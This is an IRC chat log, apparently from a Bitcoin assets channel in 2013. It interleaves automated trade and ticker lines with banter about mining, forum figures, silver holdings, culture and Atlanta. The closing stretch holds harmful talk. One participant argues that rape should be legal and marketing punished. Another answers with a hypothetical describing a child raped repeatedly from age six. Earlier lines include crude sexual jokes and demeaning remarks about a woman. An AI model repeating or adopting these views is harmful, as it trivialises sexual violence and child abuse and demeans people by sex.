24 hour high: 117.01000, 24 hour vwap: 107.91913 May 05 05:16:38 [BTCTC] [PAJKA.BOND] 10 @ 0.101 = 1.01 BTC [+] May 05 05:16:45 [BTCTC] [PAJKA.BOND] 41 @ 0.100021 = 4.1009 BTC [-] May 05 05:18:06 [MPEX] [S.MPOE] 25 @ 0.00068919 = 0.0172 BTC [-] May 05 05:18:08 [MPEX] [S.MPOE] 5398 @ 0.00068877 = 3.718 BTC [-] May 05 05:18:23 [BTCTC] [BTC-BOND] 3 @ 0.01003 = 0.0301 BTC [+] May 05 05:24:21 [BTCTC] [TAT.ASICMINER] 66 @ 0.0125 = 0.825 BTC May 05 05:27:24 yay May 05 05:31:30 [BTCTC] [ASICMINER-PT] 1 @ 1.22001 BTC [-] May 05 05:34:57 ;;bc,stats May 05 05:35:04 Current Blocks: 234564 | Current Difficulty: 1.0076292883418716E7 | Next Difficulty At Block: 235871 | Next Difficulty In: 1307 blocks | Next Difficulty In About: 1 week, 1 day, 19 hours, 56 minutes, and 45 seconds | Next Difficulty Estimate: 10108252.5885 | Estimated Percent Change: 0.31718 May 05 05:37:38 seems a little odd that the estimated diff is not increasing even tho AM has added like 10TH... May 05 05:38:33 there are a lot of GPU miners selling their rigs or switching to alt coin mining (anecdotal) May 05 05:41:24 ;;ticker May 05 05:41:25 BTCUSD ticker | Best bid: 115.97761, Best ask: 115.99000, Bid-ask spread: 0.01239, Last trade: 115.97761, 24 hour volume: 133434.20303370, 24 hour low: 94.56359, 24 hour high: 118.36500, 24 hour vwap: 108.44522 May 05 05:51:49 o hey, that's you ThickAsThieves May 05 05:52:28 yep, just went live on BTCT May 05 05:53:30 been live on bitfunder for a couple days May 05 05:55:05 cool May 05 05:57:41 morning all May 05 05:57:48 hi May 05 05:57:53 where u at? May 05 05:57:55 lol :) May 05 05:58:12 copumpkins sex dungon May 05 05:58:25 at least he game me one free hand to type May 05 05:58:34 this sounds solanaceae-y May 05 06:00:39 Solanaceae are a family of flowering plants that includes a number of important agricultural crops. Although many species are toxic plants, some are edible and healthy. May 05 06:00:40 which are asterids, whereas curcubitacea are rosids. this is serious clade jumping going on here. May 05 06:00:53 copumpkin is behaving out of character! May 05 06:01:13 i asked someone to fuck me yesterday, he got there first... May 05 06:01:32 [BTCTC] [ASICMINER-PT] 1 @ 1.25181 BTC [+] May 05 06:01:47 copumpkin is copumpkin? May 05 06:01:51 i said some figurativly that he took litererly, and it cost my my anal virginity May 05 06:02:11 ;;ident copumpkin May 05 06:02:12 Nick 'copumpkin', with hostmask 'copumpkin!~copumpkin@unaffiliated/copumpkin', is not identified. May 05 06:02:16 i wonder if it is a script, where he said that no matter waht i said May 05 06:02:26 it would ahve been in context 12 hours ago May 05 06:03:40 seems so. robot pineaple from outer space May 05 06:03:59 it had to do with my shock of us being at 115 when i wanted to buy back in at 75 **** BEGIN LOGGING AT Sun May 5 11:16:27 2013 May 05 11:39:03 [BTCTC] [ASICMINER-PT] 1 @ 1.219 BTC [-] May 05 11:40:08 hey MP https://bitcointalk.org/index.php?topic=178336.msg2032349#msg2032349 May 05 11:40:16 think that could be the finish guy? May 05 11:40:57 hm May 05 11:40:58 why not May 05 11:44:27 nah. not at all the same facial features. May 05 11:45:27 the camwhore pic is lol tho May 05 11:46:40 [BTCTC] [BASIC-MINING] 7 @ 0.410001 = 2.87 BTC [+] May 05 11:46:44 [BTCTC] [BASIC-MINING] 1 @ 0.41 BTC [-] May 05 11:47:10 i kinda doubt it as well, but man, it would explain a few things:) May 05 11:48:07 [BTCTC] [BASIC-MINING] 2 @ 0.4005 = 0.801 BTC [-] May 05 11:50:16 well yeah. nevertheles... May 05 11:50:20 [BTCTC] [COGNITIVE] 2 @ 0.22701 = 0.454 BTC [+] May 05 11:50:30 [BTCTC] [COGNITIVE] 1 @ 0.227 BTC [-] May 05 11:50:34 [BTCTC] [COGNITIVE] 2 @ 0.2263 = 0.4526 BTC [-] May 05 11:50:37 no, i'm pretty sure this is a young guy with a little money/ a business who discovered btc later than us, got real excited, wanted to burn the stages May 05 11:50:48 because wtf, why listen to mpoe-pr, she's a woman. May 05 11:51:11 i think he likes you honestly May 05 11:51:21 but cant deal with someone who only says insults May 05 11:51:26 i think he dislikes me but would like my approval. May 05 11:51:53 she really for the most part does not do anything but show how trash she is May 05 11:52:06 she can not attack people with wit or class May 05 11:52:13 insults only go so far May 05 11:52:37 have you seen the latest ? May 05 11:52:40 she can have good posts if she is objective and not attacking a person or idea May 05 11:52:52 i doubt it, im just talking about over the last 2 eyars or whatever May 05 11:53:22 any one here want 10,000 ltc for 309 or so btc? May 05 11:53:23 lemme see this, i lolled. May 05 11:53:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.01255 BTC [+] May 05 11:53:39 shec an have good posts, but on average she does more harm than good May 05 11:54:03 [BTCTC] [COGNITIVE] 1 @ 0.22632 BTC [+] May 05 11:54:13 [BTCTC] [COGNITIVE] 2 @ 0.22631 = 0.4526 BTC [-] May 05 11:54:21 [BTCTC] [COGNITIVE] 12 @ 0.2263 = 2.7156 BTC [-] May 05 11:54:50 https://bitcointalk.org/index.php?topic=195110.msg2031276#msg2031276 May 05 11:55:12 she's actually better at the wit & class takedowns imo May 05 11:55:19 it's just on the forum she rarely has any opportunity to. May 05 11:57:02 well these three people are clearly idots May 05 11:57:29 i avoid the whole economic subsection as 985 of the people who post there are idots May 05 11:57:38 the real people who understand, are doing shit... May 05 11:57:43 like in the assets subsection May 05 11:58:41 she rarely if ever goes after people who actually do something afaik. May 05 11:59:27 [BTCTC] [CRYPTO-TRADE] 3 @ 0.13011 = 0.3903 BTC [+] May 05 11:59:34 [BTCTC] [CRYPTO-TRADE] 3 @ 0.12501 = 0.375 BTC [-] May 05 11:59:40 she was after me for months about my mining operation claiming it was a scam cuz no photos. i told her three times the link to the photos wherein the op of the thread May 05 11:59:46 [BTCTC] [CRYPTO-TRADE] 1 @ 0.125001 BTC [-] May 05 11:59:52 [BTCTC] [CRYPTO-TRADE] 5 @ 0.125 = 0.625 BTC [-] May 05 12:00:06 she has improved ill give you that but her last attack on reptillia man seems kinda lame May 05 12:00:14 seemed May 05 12:01:15 as crazy as it sounds, the repillia guy might be right and we hit, $300,000 a btc by new years May 05 12:01:41 i think he is nuts but it should be expressed with something other than an insult May 05 12:01:52 [BTCTC] [CRYPTO-TRADE] 1 @ 0.13012 BTC [+] May 05 12:02:41 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1001 BTC [-] May 05 12:03:30 so go do it lol. May 05 12:03:31 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1 BTC [-] May 05 12:04:35 that sell to that repitilla guys has made my portfolio out of balance, i have more cash on hand than i want in thailand... May 05 12:04:46 i dont trust the banks May 05 12:05:04 the only way i see getting it out of thailand is buying back btc May 05 12:05:21 yeah May 05 12:05:25 well 1/2 of one May 05 12:05:30 he wired me 2.65 million baht May 05 12:05:46 well, he at one point had 2.65 million bhat May 05 12:05:52 but i would say yes May 05 12:06:02 he is a bit delusional but id say he is real May 05 12:06:08 well more than a bit May 05 12:06:47 yeah and he joined the bull market a bit too late May 05 12:07:01 $72 is his lowest buy in i think May 05 12:07:10 clearly he bought from me at 133 or so May 05 12:07:16 i dont know if higher or not May 05 12:08:09 he claims to ahve 10,000 oz of silver May 05 12:08:20 im a silver bug and i dont even have that much silver May 05 12:09:45 what's that, like 300 btc's worth ? May 05 12:10:07 $240,000 usd May 05 12:10:17 well more than that May 05 12:10:33 2100 or so btc May 05 12:10:48 aha May 05 12:10:59 nothing massive, but its still something May 05 12:12:22 ye May 05 12:13:46 lol May 05 12:13:53 i have a 1000 oz bar.... May 05 12:14:25 i dont have photos of my silver May 05 12:15:06 honestly half of it iv never even seen May 05 12:17:12 mine is only 970ish oz but its a comex bar, they call it 1000oz bars. May 05 12:18:56 if anyone cares, seems the lme is moving to hk May 05 12:19:18 does not really effect me May 05 12:19:32 but really, its logical May 05 12:24:43 :) May 05 12:34:52 he is a nutter who odds are is on coke/weed and thin\ks btw will be 1 million usd by christmas May 05 12:34:52 he is also having a conferance in finland where everyone is forced to wear top hats and drive in limos May 05 12:34:52 otehr than looking fancy they are going to try to set up a "super node" dealership network May 05 12:34:52 however no one is going cuz lack of plaaning and it being too soon May 05 12:34:52 mp did that pretty much cover it? May 05 12:35:27 i might have left something out, been a lot of lulz May 05 12:35:38 lol i had no idea about the top hats May 05 12:35:41 well... im not sure what he wants to accomplish May 05 12:35:43 bwahahaha May 05 12:36:06 mp well they are not forced to wear top hats but he did get a limo and the point is to be a show off May 05 12:36:39 yeah. so weird tho, americans are really uncomfortable showing off. May 05 12:40:26 i did exagerate that a bit May 05 12:40:27 but it just seemed fitting for the style he is going for May 05 12:40:27 the first 3 qare his staff May 05 12:40:27 so really only 3 May 05 12:40:28 and they are all new people who are in the area who want to learn more about btc May 05 12:40:36 i dont think they are "super nodes" May 05 12:40:57 what's a node anyway. May 05 12:42:26 https://bitcointalk.org/index.php?topic=192122.msg2030167#msg2030167 lmao May 05 12:46:41 [BTCTC] [COGNITIVE] 1 @ 0.22631 BTC [+] May 05 12:46:42 [BTCTC] [COGNITIVE] 9 @ 0.2263 = 2.0367 BTC [-] May 05 12:46:43 [BTCTC] [ASICMINER-PT] 4 @ 1.219 = 4.876 BTC [-] May 05 12:46:43 [BTCTC] [ASICMINER-PT] 2 @ 1.219 = 2.438 BTC [-] May 05 12:46:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.01255 = 0.2259 BTC [+] May 05 12:49:23 inaba is about as good with pr as your girl... May 05 12:52:08 lol May 05 12:52:10 not really. May 05 12:52:19 actually i don't know anyone nearly as good as her on those forums. May 05 12:52:30 for pr? May 05 12:52:32 perhaps gavin, but only on the condition that he keeps quiet a lot on most issues. May 05 12:52:34 yes for pr. May 05 12:53:11 well to each thier own, imo they both do more hard to the image of the company they work for May 05 12:53:22 harm* May 05 12:53:57 pr is about communication, you must be confusing it with advertising ? May 05 12:54:48 public relations, yes clearly there is communication, but you communicate ideas, the ideas she communicates are not what i would considrer to be good May 05 12:54:52 inaba same May 05 12:55:18 as in not good for the image of the company she represents and is speaking for May 05 12:55:53 when she has the PR tag she is your face to the world May 05 12:56:04 people see her, and judge you and your company May 05 12:56:19 yeah. exactly. May 05 12:56:32 the difference here would be that inaba never gave a strauight answer, has been caught lieing etc. May 05 12:56:37 they dont take her siourly, and so they dont take you either May 05 12:56:44 mpoe-pr has given nothing but straight answers, and has alweays been right. May 05 12:56:49 seems to me quite a difference there. May 05 12:56:56 i beg to differ. May 05 12:57:25 yes there is a differance between her and inaba, but just cuz inaba is fail does not mean your pr girl is good May 05 12:57:27 she's probably the only one there taken quite seriously. May 05 12:57:34 by whom? May 05 12:57:45 she is one of the mostly highly ignored people May 05 12:57:48 everyone. when she drops the shoe the entire dev team gets cracking for one. May 05 12:57:56 mircea_popescu: re. the showing off, I've often wondered about that myself. May 05 12:57:58 eh right, like that matters. May 05 12:58:02 cads aha ? May 05 12:58:16 placing someone on ignore does not = respect May 05 12:58:57 but what truffles said, it does seem you guys just dont give a fuck May 05 12:59:02 In america, when someone shows off they tend to be an asshole. Keeping your cards close to your chest is often a better social move here, because showing off invites open ridicule. May 05 12:59:09 [BTCTC] [ASICMINER-PT] 1 @ 1.2189 BTC [-] May 05 12:59:32 truffles is of course on my ignore, so yeah. May 05 12:59:41 From my personal experience, for example, when Romanians show off in front of Americans, at best they tend to be perceived as lovable assholes. The fact that many romanians tend to show off only they can back it with something tangible helps in establishing relationships between americans and romanians, but there is often a secret distaste. May 05 12:59:46 yeah showing off in thailand is so much different than showing off in the usa May 05 12:59:58 cads where's the romanians spring up from ?! May 05 13:00:16 I'm romanian, hah May 05 13:00:29 a lol ok. May 05 13:00:43 wow 2/3rd of this conversation is romainian :) May 05 13:00:48 anyway, the problem is mistaken socialisation. the average american can not simply go talk to a woman. May 05 13:00:58 they have weirdo protestant issues. May 05 13:01:17 i ahve no problem with your girl being a girl, that is not it at all lol May 05 13:01:33 no, we were discussing his showoff thing. May 05 13:01:42 inaba? May 05 13:01:48 i thought the mpoe-pr discussion is over, as in, sigh. May 05 13:01:50 reptilla? May 05 13:02:01 are you ignoring cads or something ? May 05 13:02:05 mircea_popescu: yep. And they're also very guarded about their real capabilities, so for example, whereas a romanian might be happy to brag about how little he payed on a car if you ask, asking an american the same question is often a faux pas. May 05 13:02:15 [BTCTC] [ASICMINER-PT] 1 @ 1.219 BTC [+] May 05 13:02:20 im multy tasking, sorry, im sure the fail is on my end May 05 13:02:25 eh faux pas my foot. May 05 13:02:58 i submit that taking this retarded childrengarten bullshit into consideration is empowering the mental disease. May 05 13:03:09 [BTCTC] [ASICMINER-PT] 2 @ 1.22 = 2.44 BTC [+] May 05 13:03:10 it's not a faux pas and if johnny thinks so let him go in a corner and sulk May 05 13:03:39 in thailand if you ahve money you are expected to show off May 05 13:04:01 people pay 4 times the normal price of a car (cuz taxes) just so they can show off May 05 13:04:07 lol May 05 13:04:12 hehe May 05 13:04:14 nice! May 05 13:04:17 people respect things ehre more than people and idea May 05 13:04:20 nobody can just be normal it seems ;/ May 05 13:04:36 its not how smart your brain is, but how smart you are dressed that matters May 05 13:05:13 mp truffles wants to know what "normal" means May 05 13:06:35 mircea_popescu: for salaried upper middle class workers in romania, what is the normal attitude towards revealing their exact salary figure to their coworkers? May 05 13:07:06 ah wage slaves May 05 13:07:28 cads i have no idea tbh. May 05 13:07:36 !ticker May 05 13:07:36 ;;ticker May 05 13:07:37 Are you sure you have no tobacco? May 05 13:07:37 BTCUSD ticker | Best bid: 108.96000, Best ask: 108.97164, Bid-ask spread: 0.01164, Last trade: 108.97164, 24 hour volume: 138012.31532447, 24 hour low: 100.00000, 24 hour high: 118.85000, 24 hour vwap: 110.86925 May 05 13:07:58 Say I receive $100K a year, and I suspect that this is $20K more than the rest of my coworkers in the same position as me, because I'm more skilled. Would it be something I'd brag about? May 05 13:09:15 i dont think mp knows many wage slaves May 05 13:10:04 hehe, perhaps not May 05 13:10:18 yeah i tend to not hire romanians May 05 13:11:34 anyway, as far as salaries go about 7k a year pre tax would be an average salary. May 05 13:11:48 i don't see where exactly you'd be making 100k a year and have coworkers in the same office making 80. May 05 13:12:11 senior tv execs working for the main network make 15 or some shit May 05 13:13:05 do most people speak english in romania? May 05 13:13:22 sounds like a fun place to visit May 05 13:13:28 senior corporate officers in state entreprises make something like 15-20k and they're talking of introducing a tax just for them to lower that. May 05 13:13:38 mircea_popescu: this is common here in upper management in mid to large scale businesses. My understanding is that when the amounts of money are that large, it becomes profitable to remain private about them. People say "I got the raise!" but don't say how much the raise was. May 05 13:13:44 Chaang-Noi the younger kids mostly do, about half pretty well about half so-so May 05 13:13:48 the older folks mostly don't. May 05 13:13:58 cool May 05 13:14:10 if i make it to europe ill stop by May 05 13:14:38 cads you know i'm perfectly aware who makes what where May 05 13:15:04 "Can Facebook lead to psychosis? One study says so" win. May 05 13:15:49 hah, charming May 05 13:16:14 where are you anyway, canada ? May 05 13:16:39 Atlanta May 05 13:17:01 You? Bucharest? May 05 13:17:24 timisoara atm May 05 13:27:13 can you hunt brown bears? May 05 13:27:16 Chaang-Noi: are you from thailand? May 05 13:27:16 hehe, truffles, are you just used to people ignoring you? May 05 13:37:10 truff1es: I mean, this "everyone on the internet are assholes" attitude. What does that win? Imo, I only see people on the net as assholes when 1) I'm expecting them to mollycoddle and be nice to me 2) my emotional state somehow depends on whether they agree with me or 3) I take what people they far more seriously than the medium would indicate is rational. May 05 13:38:28 This is a cheap-talk medium for the most part. Bad argumentation, bravado, and meanness are the game here - imo, you can only distinguish yourself by making decent arguments, being philosophically charitable, and ignoring "asshole" behavior May 05 13:40:23 truff1es: I agree. if I'm getting ignored but I'm not also ignoring the people that have ignored me, then I'm admitting some sort of moral defeat, May 05 13:42:23 truff1es: I mean, some people are so incoherent in their opinions that I get the distinct feeling that I'm _stupider_ after arguing with them, and if these people consistently attack my positions with poor argument tactics, then I have little to gain from them in way of exchange of ideas, and I ignore them. May 05 13:44:21 truff1es: information from a random variable is what you make of it, true, but if the variable is too random, it's impossible to make knowledge from it, however hard you try :D May 05 13:47:08 truffles, lets put it this way. Consider you talk to 10 people online, and you know that 9 of those people tend to say things that you fine useful, some of the time. But now imagine that the 10th person not only says things that are useless, they also try to mislead you, and they drown out the reasonable words of the other 9 people. May 05 13:48:01 And suppose that after extensive attempts at asking for clarification, the person continues to demonstrate that they do not have your interest in mind - they continue to BS you, and what's worse, arguing with them makes you look like a fool in front of the other 9 people. May 05 13:50:17 truff1es: sure, let me clarify with an example. 9 people are decent people interested in talking about the topic, and the 10th person is just a troll, interested in ridiculing anyone that gives them attention. Say they are flooding the channel, and there are no ops, and you're being distracted from your other 9 contemporaries. May 05 13:51:08 would you not ignore the offensive charachter? Or would you force yourself to take cognitive loss, and manually take the time filter out the useless chatter? May 05 13:52:28 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [-] May 05 13:52:32 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [-] May 05 13:52:45 truff1es: giving yourself a cognitive advantage by ignoring the poor information source is a good strategy in these situations - it's not weakness, it's prudence. May 05 13:53:30 cads http://trilema.com/2013/my-background-cliffsnotes/ May 05 13:53:35 there, you're responsible. May 05 13:53:49 oh dear god, for what? May 05 13:54:14 oh what have I done :D May 05 13:55:33 lol May 05 13:56:29 hehe, truff1es I hear what you're saying, but surely even you draw limits at a certain point: consider, one may choose not hang out on 4chan. This is the same as ignoring every single member of 4chan. If you believe you have the capacity to filter out all information by directly reading it, then why aren't you plugged into every chat in the world, filtering? May 05 13:56:29 [BTCTC] [BITVPS] 1 @ 0.00131 BTC [-] May 05 13:56:40 [BTCTC] [BITVPS] 1 @ 0.0013 BTC [-] May 05 13:56:45 [BTCTC] [BITVPS] 17 @ 0.00122 = 0.0207 BTC [-] May 05 13:56:57 [BTCTC] [BITVPS] 50 @ 0.001211 = 0.0606 BTC [-] May 05 13:56:59 [BTCTC] [BTC-BOND] 240 @ 0.01 = 2.4 BTC [-] May 05 13:57:04 [BTCTC] [BITVPS] 833 @ 0.0012 = 0.9996 BTC [-] May 05 13:57:06 [BTCTC] [BTC-BOND] 2 @ 0.01003 = 0.0201 BTC [+] May 05 13:57:18 that was uncharitable, but I hope you get my drift - ignoring someone is just one of the many ways of filtering your information input May 05 13:58:06 I believe that you simply assign a negative emotional connotation towards it because you've been at the blunt end of an ignore or two, and you know how much that stings May 05 14:01:09 I would agree there May 05 14:02:26 [BTCTC] [B.YABMC] 4 @ 0.015999 = 0.064 BTC [-] May 05 14:02:43 nah, I think I may have made a red herring there May 05 14:03:08 truff1es: also, it occurs to me that leaving a chat room is not the same as ignoring everyone in that chat room. Information is not symmetric, in the latter case. May 05 14:03:57 [BTCTC] [CRYPTO-TRADE] 1 @ 0.19794 BTC [+] May 05 14:05:46 truff1es: If I ignore someone in a chat, they can still see what I'm saying. So it's not the same thing as leaving the chat. Ignore can be used to assert a sort of dominance. May 05 14:07:02 truff1es: In other words, ignore actually can be used as an asshole strategy. is that part of your argument against the desirability of ignore? May 05 14:07:37 I would argue that I have used ignore judiciously many times... but I'd also admit that I've used it a few times in a mean spirit. May 05 14:08:15 *shrug*, in any case, we could philosophize about this all day May 05 14:08:24 any closing words? May 05 14:08:41 it's time to cook some breakfast and get started with the day here :D May 05 14:09:33 now you know why he's on my ignore. May 05 14:09:45 there's plenty of fucking support channels for people with emo issues. this happens to be the bitcoin assets chan. May 05 14:09:54 he has no assets and so doesn't really belong. May 05 14:11:56 haha, mircea_popescu, and what assets have I? Besides my charming good looks, which are hardly fungible ;) May 05 14:12:45 it's a start. May 05 14:12:58 I guess maybe the only claim to legitimacy I have is that I'm genuinely interested in understanding assets May 05 14:24:17 truff1es: good deal. as long as we remain teachable, life is pretty good, I find May 05 14:25:18 just.. don't learn any lessons that are not profitable May 05 14:26:04 [BTCTC] [TAT.ASICMINER] 2 @ 0.01255 = 0.0251 BTC [+] May 05 14:28:52 piratebay now accepts litecoins :) May 05 14:30:04 what? May 05 14:30:16 to send them ltcs? May 05 14:30:25 piratebay.sx May 05 14:30:37 but no, to send ltc you dont need a mirror, that is not how litecoin owrks May 05 14:31:01 [BTCTC] [TAT.ASICMINER] 21 @ 0.01255 = 0.2636 BTC [+] May 05 14:33:06 then send them some crypto they take btc too May 05 14:42:34 [BTCTC] [BASIC-MINING] 6 @ 0.4 = 2.4 BTC [-] May 05 14:43:29 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [-] May 05 14:44:02 [BTCTC] [ASICMINER-PT] 2 @ 1.222 = 2.444 BTC [+] May 05 14:52:14 [MPEX] [S.MPOE] 8111 @ 0.00069491 = 5.6364 BTC [+] May 05 14:52:19 [MPEX] [S.MPOE] 1839 @ 0.0006992 = 1.2858 BTC [+] May 05 14:58:06 111.111 lol May 05 14:58:09 ;ticker May 05 14:58:12 ;;ticker May 05 14:58:13 BTCUSD ticker | Best bid: 111.10903, Best ask: 112.08978, Bid-ask spread: 0.98075, Last trade: 112.08978, 24 hour volume: 138738.91461295, 24 hour low: 101.10201, 24 hour high: 118.85000, 24 hour vwap: 111.33594 May 05 15:00:25 Chaaang-Noi: you cool as shit May 05 15:00:32 even tho u a bit cray cray May 05 15:01:16 lol what? May 05 15:01:55 lol May 05 15:04:42 You is living the American Dream in Thailand. May 05 15:04:49 yeah May 05 15:05:00 life is good May 05 15:05:09 life is always good if you are living :P May 05 15:05:14 or at least should be May 05 15:05:22 sup May 05 15:05:24 i hear guantanimo bay sucks May 05 15:05:59 mircea_popescu, I read your story - quite the adventure, I see. I admire your tenacity and natural talent, while being relieved to see that you do not yet have it "all figured out", which I feel would be boring for you. I wish you continued prosperity and a future that does not cease to provide interesting situations! May 05 15:06:13 Okay: life is always good if you are living and not locked up. :P May 05 15:06:20 ha. ty. May 05 15:06:33 you are making us atlantians look bad cads May 05 15:06:46 I'm amazed with the care and attention that romanian schools give to the smart kids - here in america, being bright means being ridiculed May 05 15:06:53 [BTCTC] [TAT.ASICMINER] 84 @ 0.01255 = 1.0542 BTC [+] May 05 15:06:55 cads: We got Ludacris and Outkast tho. May 05 15:07:00 And the Braves. May 05 15:07:04 [BTCTC] [TAT.ASICMINER] 100 @ 0.01255 = 1.255 BTC [+] May 05 15:07:16 [BTCTC] [TAT.ASICMINER] 50 @ 0.012575 = 0.6288 BTC [+] May 05 15:07:24 [BTCTC] [TAT.ASICMINER] 16 @ 0.0126 = 0.2016 BTC [+] May 05 15:07:25 thestringpuller: and some nice architecture, to boot May 05 15:07:37 thestringpuller: you are an atlien? May 05 15:07:41 where is this story about mp? May 05 15:08:14 LOL. I live here. But I was born an lived my infancy in da north. May 05 15:08:14 [BTCTC] [ASICMINER-PT] 2 @ 1.2222 = 2.4444 BTC [+] May 05 15:08:16 Chaaang-Noi: repaste is here: http://trilema.com/2013/my-background-cliffsnotes/ May 05 15:08:22 I lived her most my life* May 05 15:08:38 thestringpuller: the real test: do you ever use the word "y'all" May 05 15:08:45 cads well that was some years ago. May 05 15:08:45 or the phrase "what had happened was..." May 05 15:08:48 I is from da burbs though. May 05 15:08:57 but yes, being smart meant you get the blowjobs back then May 05 15:09:22 [BTCTC] [ASICMINER-PT] 2 @ 1.22222 = 2.4444 BTC [+] May 05 15:09:23 No. I'm a suburban unfortunately. But my homies is gangsta. May 05 15:09:28 fwiw, i liked atlanta. May 05 15:09:39 i liked atlanta too May 05 15:09:42 went there recently May 05 15:09:51 trap http://www.rtcons.com/wall/15830.11.png May 05 15:10:08 some of it reminded me of parts of Boston May 05 15:10:17 looks like a bad geek hairdo May 05 15:10:30 it's the only metro city i've been to in the southeast that i liked May 05 15:10:39 mircea_popescu, ThickAsThieves, ty. I love my city, and really, economically, architecturally, culturally, there are only a handful of other american cities that match or exceed it. May 05 15:10:44 [BTCTC] [ASICMINER-PT] 6 @ 1.222222 = 7.3333 BTC [+] May 05 15:11:00 at least so I tell myself, lol May 05 15:11:04 Atlanta is lame yo. Whatchu talkin' bout cads. May 05 15:11:15 you could do worse. you could be from like... i dunno, mobile ? May 05 15:11:26 la ? May 05 15:11:30 We have lame colleges, and lame infrastructure. We just happen to not be as lame as the other places around us. May 05 15:12:02 lame colleges only matter up until you're about 25. then you realise it's a waste of time anyway May 05 15:12:25 thestringpuller: haha, as a recent college dropout, I can attest to the lame college. As a daily marta rider for the last two years, I can attest to the failing infrastructure. May 05 15:13:04 State school kinda suck. It's all public image and no substance. May 05 15:13:13 Exactly what mircea_popescu loves. May 05 15:13:15 :P May 05 15:13:25 still, there is something rough, vulgar, and thriving about this city that I don't feel when in, say, pittsburg, or saint louis, or miami May 05 15:13:52 That's because so many people come through it. May 05 15:13:58 Atlanta is a whore with that airport of hers. May 05 15:14:15 imo, hating on atlanta and loving on it are the same practice, so anyways, enough loving on atlanta ;) May 05 15:14:23 http://mbostock.github.io/d3/talk/20111116/airports.html hover over atlanta May 05 15:15:09 [BTCTC] [GSDPT] 100 @ 0.003189 = 0.3189 BTC [+] May 05 15:15:20 whoa i had no diea May 05 15:15:24 bigger than ohare even May 05 15:15:30 oh gosh, the airport... it's like rich white men said, "lets take the poorest sector of the city and put an airport in it. But here's the catch, lets hire _only people from the suburbs, MUAHAHAHA" May 05 15:16:33 The only thing more lame than living in Atlanta is Texas. May 05 15:17:09 i loved texas gtfo May 05 15:17:20 Have you ever lived there?!? May 05 15:17:31 That place is miserable unless you were born in a desert :P May 05 15:17:38 actually, there's a lot of that 'white privilege' sentiment going on it Atlanta. That, and the narrow religious views, those are the only things I really dislike about my city. May 05 15:18:08 cads: not the trend of becoming hipster land May 05 15:18:54 thestringpuller you kidding, all it has are hot blondy bartenders who buy me drinks May 05 15:19:14 so does LA but the weather is far superior May 05 15:19:29 meh. May 05 15:19:59 It goes over 100 in that Texas/Arizona region May 05 15:20:18 thestringpuller: one time some black dudes came into my house and beat me and robbed me at gun point. The interrogated me for an hour about where the drugs were (my roommate at the time was a drug dealer - bad fucking choice on my part). In the months after that I found rascist sentiment from around me was taking root in my mind very easily. May 05 15:20:26 so I decided to hate hipsters instead May 05 15:20:40 The only time I've gone to Las Vegas I thought I was going to melt, or at least my shoes. May 05 15:20:42 I despise rascism as a form of extreme mental weakness May 05 15:20:59 but then I realized that my new found hate of hipsters was just as bad! May 05 15:21:22 cads wait. May 05 15:21:25 dude hipsters suuuuck, they are leftovers from the dot com boom May 05 15:21:26 you KNEW he was dealing ? May 05 15:22:15 mircea_popescu: worse, I was a customer. He was a pot dealer, nothing serious, but he had a high profile. May 05 15:22:32 well that was pretty retarded, then. what did you think was going to happen ? May 05 15:22:59 cads is jesse pinkman May 05 15:23:02 lol May 05 15:23:24 mircea_popescu: I wasn't in a mental state to attempt to compute rational expectations at the time. May 05 15:23:43 i'm envisaging that brad pitt role in true romance May 05 15:23:48 thestringpuller: haha, minus the meth May 05 15:23:51 incidentally, wasn't that the most adequate role for pitt ever ? May 05 15:24:15 haha, you're going to think me a philistine, but I've not seen the film, despite being a pitt fan May 05 15:24:58 its not bad. May 05 15:25:02 actually i wonder... May 05 15:25:06 ;;google trilema true romance May 05 15:25:07 New MPEx key pe Trilema - Un blog de Mircea Popescu.: ; So what's the plan with MPOE/MPEx ? pe Trilema - Un blog de ...: ; The Trilemma Revised: Harry Potter and a Landscape of Moral ...: May 05 15:25:14 seems not May 05 15:25:17 mp Argentina eh? May 05 15:25:25 http://trilema.com/2013/true-romance-tarantino-cut/ May 05 15:25:29 dude google is fucking useless May 05 15:25:30 i want has visit May 05 15:25:42 Chaaang-Noi bring silver May 05 15:25:50 that i can do May 05 15:25:55 thestringpuller: remember when pinkman is in rehab, convincing others to go back out and use? Yeah, I don't think I was ever that bad off, lol May 05 15:25:58 they like dollars as well May 05 15:26:05 that's just low, lol May 05 15:26:13 Chaaang-Noi its a joke. i think half the world;s silver comes from argentina May 05 15:26:19 hence the motherfuckin' name May 05 15:26:27 i know they have hard currancy issues, May 05 15:26:38 mircea_popescu: aha, another person that notices that google's performance is collapsing under the cascade of data May 05 15:26:40 i dont think silver is a bad idea, but dollars from the usa are better May 05 15:26:56 mircea_popescu: we need another fundamental breakthrough in search engine technology, but soon. May 05 15:27:11 i think the problem is gribble aint personalized :) May 05 15:27:12 cads by the time you give it the site title and two words from the page title and it finds two pages on that site w/o the words in them... May 05 15:27:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.0126 = 0.126 BTC [+] May 05 15:27:28 kakobrekla you know my browser is anon. May 05 15:27:39 perhaps an incentive structure that doesn't force the search engine firm to degrade its search quality in return for profits May 05 15:27:48 mircea_popescu they only correct way May 05 15:27:58 cads that's only going to happen once we make marketing illegal. May 05 15:28:07 i don't understand why rape is illegal and marketing is not ffs. May 05 15:28:26 the other way around would make for a better world even. May 05 15:30:52 Haha, trading the maiden-hood for the consumer good. May 05 15:31:32 you may be right, strictly speaking - the problem is that people have not yet understood that marketing equals coercion May 05 15:31:42 but i mean, what, they put up signs and what, i have to "Deal with it" ? May 05 15:32:00 why doesn't the rape victim "Deal with it" while all the marketing bullshit is punished by 20 to life. May 05 15:32:46 hah, mircea, for someone with such a pretty mouth you sure are courageous to unleash rape on the world May 05 15:33:01 legal rape would still be abhorrent May 05 15:33:10 legal marketing is even more abhorrent May 05 15:33:17 hehe, and pardon my joke May 05 15:33:40 actually ima write this up, the similarities line up all too well. May 05 15:36:46 mircea_popescu: I would be forced to agree, though in your writeup consider that you are a parent with a daughter. You live in a world where the collapse of the viability of marketing strategies has lead to an unprecedented increase in the productivity and quality of life, on average. And all that you've had to pay is that your daughter got raped 6 times while she was growing up, starting at the age of 6, with her teacher, 9 with a boy May 05 15:36:46 in the town, 11 with a janitor, and so on. You did not have legal resource 